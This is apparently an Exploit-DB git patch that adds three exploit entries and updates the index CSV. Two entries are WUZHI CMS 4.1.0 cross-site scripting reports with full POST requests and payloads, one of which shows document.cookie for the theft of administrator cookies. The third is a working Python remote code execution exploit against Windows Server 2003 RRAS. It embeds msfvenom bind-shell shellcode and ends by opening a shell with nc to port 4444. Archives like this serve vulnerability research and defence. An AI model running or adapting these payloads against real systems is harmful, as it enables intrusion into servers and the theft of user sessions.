From 0ca4688023825c68670eea1ead77a2ed84180a72 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 14 May 2018 05:01:48 +0000
Subject: [PATCH] DB: 2018-05-14

3 changes to exploits/shellcodes

Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution
WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting
WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting
---
 exploits/php/webapps/44617.txt   | 16 ++++++
 exploits/php/webapps/44618.txt   | 28 ++++++++++
 exploits/windows/remote/44616.py | 87 ++++++++++++++++++++++++++++++++
 files_exploits.csv               |  3 ++
 4 files changed, 134 insertions(+)
 create mode 100644 exploits/php/webapps/44617.txt
 create mode 100644 exploits/php/webapps/44618.txt
 create mode 100755 exploits/windows/remote/44616.py

diff --git a/exploits/php/webapps/44617.txt b/exploits/php/webapps/44617.txt
new file mode 100644
index 000000000..ae944a982
--- /dev/null
+++ b/exploits/php/webapps/44617.txt
@@ -0,0 +1,16 @@
+# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability
+# Date: 2018-4-23
+# Exploit Author: jiguang (s1@jiguang.in)
+# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
+# Software Link: https://github.com/wuzhicms/wuzhicms
+# Version: 4.1.0
+# CVE: CVE-2018-10313
+
+An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/133)
+There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the form%5Bqq_10%5D parameter post to the /index.php?m=member&f=index&v=profile&set_iframe=1
+
+`POST /wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 Content-Type: application/x-www-form-urlencoded Content-Length: 74 Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj; EkT_userkeys=e7%2FCIDS8IFYxTUG8kAb7Ww%3D%3D; EkT_truename=yuduo; EkT_auth=lwMUjMOtAXpsQyZViV3zkNdoXMK7Up5NWRRI4Ro4FDKECQHhZ1ntK0WcBotqHVYyx3z9AYABYpAsEx4OdqcExF5S1d7Gw31AvtN07WdqMw28yLCoyNv8RA%3D%3D; EkT__uid=ocqUyYLd7bm05%2Ft4KcS%2B6Q%3D%3D; EkT__username=URDJ1YisL%2BXkt7Mzgg3aNA%3D%3D; EkT__groupid=aZR0cJTYiMBkLfoq8PwJ0g%3D%3D; EkT_modelid=10; tFf_uid=ej6BNn7ulZVYfrHwlgXMvg%3D%3D; tFf_username=YuhCykTKqrPt5fHl2zROVg%3D%3D; tFf_wz_name=IAFonn80xi%2FUvXNXx8uR%2FQ%3D%3D; tFf_siteid=dUi1cO%2FrqMr0atgyt9b%2BNw%3D%3D; tFf_auth=EVUCupGrAYuOzHKFNYqbS%2B39rd2Ynyn74kyNU3KlUwiQCJGQMAgEMU0go7SqkJsUA8kNZq6BsF5nFNbEeL5ehNOQ5DkCGZ4h4JnRqFB8UFIh9kWHsJe84Q%3D%3D; tFf__uid=FM0wd0X5ONWZsKHK8N3j%2Fw%3D%3D; tFf__username=haycqodNzDQbfpqnsWY3xA%3D%3D; tFf__groupid=I7EFExZnf2tvQCMhDV%2B1nA%3D%3D; tFf_truename=yuduo; tFf_modelid=10; SwW_uid=Bk1YojgAB4vSAv%2BmPy3WYg%3D%3D; SwW_username=BTEh6yj6GaEMdyByi0JOZw%3D%3D; SwW_wz_name=8vypKiZ6Ck1JQloRN3gGZQ%3D%3D; SwW_siteid=jm2uH%2FJAmU8uh1X4AlQ1nQ%3D%3D; SwW_qkey=sSAglhFB%2F04GAI1A3H4vDpnfBjktIjQO; SwW_truename=yuyuyu; SwW_auth=qVG8d0BqbIYaHf7emEsG%2Bz%2Fo4LTxYomIRzLjUyu1wWd0BfW4Eucw1UXVm3OTEBexHDGzzwvYarSW62r%2F%2BZrP6RZloFSgyn1%2B5QSsfVv8XDbbIN5Wzd32rQ%3D%3D; SwW__uid=SQgSrskOQqPeThE7vxpQuQ%3D%3D; SwW__username=ZnY2K%2B8IB6WgdsrHTD%2F%2Fzg%3D%3D; SwW__groupid=wVnor3QYe03CC%2B9JInwPIQ%3D%3D; SwW_modelid=10 Connection: close Upgrade-Insecure-Requests: 1
+
+`form%5Bqq_10%5D`=234234" onmouseover="confirm(22)&submit=%E6%8F%90%E4%BA%A4`
+
+------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/44618.txt b/exploits/php/webapps/44618.txt
new file mode 100644
index 000000000..7666eed5c
--- /dev/null
+++ b/exploits/php/webapps/44618.txt
@@ -0,0 +1,28 @@
+# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability
+# Date: 2018-4-23
+# Exploit Author: jiguang (s1@jiguang.in)
+# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
+# Software Link: https://github.com/wuzhicms/wuzhicms
+# Version: 4.1.0
+# CVE: CVE-2018-10311
+
+An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/131)
+There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the tag[pinyin] parameter post to the /index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=?&_submenuid=?
+
+
+`[POST /www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101 HTTP/1.1
+ Host: localhost
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
+ Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ Accept-Encoding: gzip, deflate
+ Referer: http://localhost/www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 270
+ Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3;  EkT_uid=c%2FzWH2EByNj%2Fm78WencnAg%3D%3D;  EkT_username=oR5iColhZ3j6z343ib%2B9Lg%3D%3D;  EkT_wz_name=LVeemy520l5DQnc4SQGtsw%3D%3D;  EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D;  EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ 
+tag%5Btag%5D=jiguang&tag%5Btitle%5D=jiguang&tag%5Bkeyword%5D=jiguang&tag%5Bdesc%5D=jiguang&tag%5Bisshow%5D=1&tag%5Blinkageid%5D=0&LK2_1=0&##  tag%5Bpinyin%5D=ji%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E&tag%5Bletter%5D=&tag%5Burl%5D=&submit=%E6%8F%90+%E4%BA%A4](url)`
+
+------------------
\ No newline at end of file
diff --git a/exploits/windows/remote/44616.py b/exploits/windows/remote/44616.py
new file mode 100755
index 000000000..e84628d5e
--- /dev/null
+++ b/exploits/windows/remote/44616.py
@@ -0,0 +1,87 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled.
+
+#The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure.
+#dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution.
+#Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using 
+#Windows Server 2003.
+
+#Exploit created by: Víctor Portal
+#For learning purpose only
+
+import struct
+import sys
+import time
+import os
+
+from threading import Thread    
+                                
+from impacket import smb
+from impacket import uuid
+from impacket import dcerpc
+from impacket.dcerpc.v5 import transport
+                 
+target = sys.argv[1]
+
+print '[-]Initiating connection'
+trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
+trans.connect()
+
+print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
+dce = trans.DCERPC_class(trans)
+
+#RRAS DCE-RPC endpoint
+dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
+
+#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
+buf =  ""
+buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
+buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
+buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
+buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
+buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
+buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
+buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
+buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
+buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
+buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
+buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
+buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
+buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
+buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
+buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
+buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
+buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
+buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
+buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
+buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
+buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
+buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
+buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
+buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
+buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
+buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
+buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
+buf += "\xc4\x25\x3d\xe9"
+
+#NDR format
+stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4)
+stub += "\x10\x27\x00\x00" #dwRoutingPID
+stub += "\xa4\x86\x01\x00" #dwMibInEntrySize 
+stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer
+stub += "\x04\x00\x00\x00"  #dwVarID (_MIB_OPAQUE_QUERY)
+stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)
+stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize 
+stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)
+stub +=  "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)
+stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO)
+stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO)
+
+
+dce.call(0x1e, stub)   #0x1d MIBEntryGetFirst (other RPC calls are also affected)
+print "[-]Exploit sent to target successfully..."
+
+print "Waiting for shell..."
+time.sleep(5)
+os.system("nc " + target + " 4444")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 360488e33..fba37c42f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -16485,6 +16485,7 @@ id,file,description,date,author,type,platform,port
 44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
+44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39302,3 +39303,5 @@ id,file,description,date,author,type,platform,port
 44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
 44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
 44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community - 2.2.0 – Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
+44617,exploits/php/webapps/44617.txt,"WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
+44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,